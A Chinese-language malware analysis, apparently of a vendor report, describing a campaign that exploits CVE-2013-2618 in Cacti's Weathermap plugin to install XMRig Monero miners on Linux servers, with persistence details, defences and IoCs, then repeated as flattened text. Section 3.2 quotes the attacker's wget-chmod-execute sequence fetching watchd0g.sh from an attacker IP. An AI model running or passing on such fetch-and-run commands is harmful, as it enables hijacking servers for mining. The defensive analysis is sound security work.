攻击者正在利用PHP Weathermap漏洞向Linux服务器传播恶意挖矿软件
字数 1475 2025-08-18 11:37:11

PHP Weathermap漏洞利用与Linux服务器恶意挖矿攻击分析

1. 攻击概述

攻击者正在利用Cacti的Network Weathermap插件中的一个已修复漏洞(CVE-2013-2618)向Linux服务器传播恶意挖矿软件。该攻击活动主要针对中国、美国、印度和日本的Linux服务器,目的是利用服务器资源进行门罗币(XMR)挖矿。

2. 攻击背景

  • 恶意挖矿软件兴起:加密货币价值上涨导致网络犯罪分子转向挖矿攻击
  • 漏洞选择原因:虽然漏洞已过时(2013年),但由于以下原因仍被利用:
    • 现成的攻击代码可用
    • 许多组织未能及时更新开源工具
    • Network Weathermap插件仅报告过两个漏洞(2014年6月)

3. 攻击链分析

3.1 初始入侵

攻击者利用CVE-2013-2618漏洞,通过以下路径进行攻击:

/plugins/weathermap/configs/conn.php
/plugins/weathermap/cools.php

3.2 恶意脚本下载与执行

攻击执行以下命令序列:

  1. 下载恶意脚本: 
    wget hxxp://222.184.79.11:5317/watchd0g.sh
  2. 赋予执行权限: 
    chmod 775 watchd0g.sh
  3. 执行脚本: 
    ./watchd0g.sh

3.3 持久化机制

watchd0g.sh脚本实现以下持久化技术:

  • 写入/etc/rc.local确保系统重启后自动执行
  • 修改/etc/crontab每3分钟运行一次
  • 监控并确保挖矿进程持续运行

3.4 挖矿程序部署

脚本下载并执行dada.x86_64(趋势科技检测为COINMINER_MALXMR.SM-ELF64),这是一个修改版的XMRig Miner。

4. XMRig挖矿程序分析

4.1 程序特性

  • 开源门罗币挖矿软件
  • 支持32位/64位Windows和Linux系统
  • 需要config.json配置文件

4.2 嵌入配置

攻击样本已将所有必要参数嵌入代码中,包括:

  • 算法(CryptoNight/CryptoNight-Lite)
  • 最大CPU使用率
  • 矿池服务器信息
  • 门罗币钱包及访问凭证

5. 攻击者收益分析

截至2018年3月21日,攻击者已挖到约74,677美元的门罗币(基于分析的两个加密货币钱包)。

6. 攻击成功条件

目标系统需满足以下所有条件:

  1. 运行Linux(x86-64)的Web服务器
  2. Web服务器可公开访问
  3. 安装Cacti并启用过期的Network Weathermap插件(v0.97a及更早版本)
  4. Web资源无需身份验证即可访问
  5. Web服务器以root权限运行

7. 防御建议

7.1 针对Network Weathermap漏洞

  • 立即更新Cacti及所有插件至最新版本
  • 禁用不必要的插件

7.2 系统安全加固

  1. 权限控制

    • 避免以root权限运行Web服务
    • 实施最小权限原则

  2. 访问控制

    • 实施强身份验证机制
    • 限制对管理界面的访问

  3. 监控与检测

    • 监控异常CPU使用率
    • 检查可疑的cron任务和启动项
    • 监控异常网络连接(特别是到矿池的连接)

  4. 补丁管理

    • 建立定期更新机制
    • 特别关注开源工具的漏洞公告

  5. 入侵响应

    • 准备应急响应计划
    • 隔离受感染系统
    • 彻底清除恶意组件

8. 入侵威胁指标(IoCs)

8.1 恶意IP地址

222.184.79.11
190.60.206.111
182.18.8.69
115.231.218.38

8.2 恶意域名

bbc.servehalflife.com
jbos.7766.org

8.3 恶意文件

  • watchd0g.sh:下载和执行脚本
  • dada.x86_64:修改版XMRig挖矿程序(COINMINER_MALXMR.SM-ELF64)

8.4 相关路径

/plugins/weathermap/configs/conn.php
/plugins/weathermap/cools.php
/etc/rc.local
/etc/crontab

9. 总结

此攻击活动展示了网络犯罪分子如何利用未及时修补的旧漏洞进行加密货币挖矿。尽管利用的漏洞已修复多年,但由于系统管理员未能及时更新软件,攻击仍然能够成功。这强调了持续漏洞管理和系统更新的重要性,特别是对于开源工具和网络监控系统。

PHP Weathermap漏洞利用与Linux服务器恶意挖矿攻击分析 1. 攻击概述 攻击者正在利用Cacti的Network Weathermap插件中的一个已修复漏洞(CVE-2013-2618)向Linux服务器传播恶意挖矿软件。该攻击活动主要针对中国、美国、印度和日本的Linux服务器,目的是利用服务器资源进行门罗币(XMR)挖矿。 2. 攻击背景 恶意挖矿软件兴起 :加密货币价值上涨导致网络犯罪分子转向挖矿攻击 漏洞选择原因 :虽然漏洞已过时(2013年),但由于以下原因仍被利用: 现成的攻击代码可用 许多组织未能及时更新开源工具 Network Weathermap插件仅报告过两个漏洞(2014年6月) 3. 攻击链分析 3.1 初始入侵 攻击者利用CVE-2013-2618漏洞,通过以下路径进行攻击: 3.2 恶意脚本下载与执行 攻击执行以下命令序列: 下载恶意脚本: 赋予执行权限: 执行脚本: 3.3 持久化机制 watchd0g.sh 脚本实现以下持久化技术: 写入 /etc/rc.local 确保系统重启后自动执行 修改 /etc/crontab 每3分钟运行一次 监控并确保挖矿进程持续运行 3.4 挖矿程序部署 脚本下载并执行 dada.x86_64 (趋势科技检测为COINMINER_ MALXMR.SM-ELF64),这是一个修改版的XMRig Miner。 4. XMRig挖矿程序分析 4.1 程序特性 开源门罗币挖矿软件 支持32位/64位Windows和Linux系统 需要 config.json 配置文件 4.2 嵌入配置 攻击样本已将所有必要参数嵌入代码中,包括: 算法(CryptoNight/CryptoNight-Lite) 最大CPU使用率 矿池服务器信息 门罗币钱包及访问凭证 5. 攻击者收益分析 截至2018年3月21日,攻击者已挖到约74,677美元的门罗币(基于分析的两个加密货币钱包)。 6. 攻击成功条件 目标系统需满足以下所有条件: 运行Linux(x86-64)的Web服务器 Web服务器可公开访问 安装Cacti并启用过期的Network Weathermap插件(v0.97a及更早版本) Web资源无需身份验证即可访问 Web服务器以root权限运行 7. 防御建议 7.1 针对Network Weathermap漏洞 立即更新Cacti及所有插件至最新版本 禁用不必要的插件 7.2 系统安全加固 权限控制 : 避免以root权限运行Web服务 实施最小权限原则 访问控制 : 实施强身份验证机制 限制对管理界面的访问 监控与检测 : 监控异常CPU使用率 检查可疑的cron任务和启动项 监控异常网络连接(特别是到矿池的连接) 补丁管理 : 建立定期更新机制 特别关注开源工具的漏洞公告 入侵响应 : 准备应急响应计划 隔离受感染系统 彻底清除恶意组件 8. 入侵威胁指标(IoCs) 8.1 恶意IP地址 8.2 恶意域名 8.3 恶意文件 watchd0g.sh :下载和执行脚本 dada.x86_64 :修改版XMRig挖矿程序(COINMINER_ MALXMR.SM-ELF64) 8.4 相关路径 9. 总结 此攻击活动展示了网络犯罪分子如何利用未及时修补的旧漏洞进行加密货币挖矿。尽管利用的漏洞已修复多年,但由于系统管理员未能及时更新软件,攻击仍然能够成功。这强调了持续漏洞管理和系统更新的重要性,特别是对于开源工具和网络监控系统。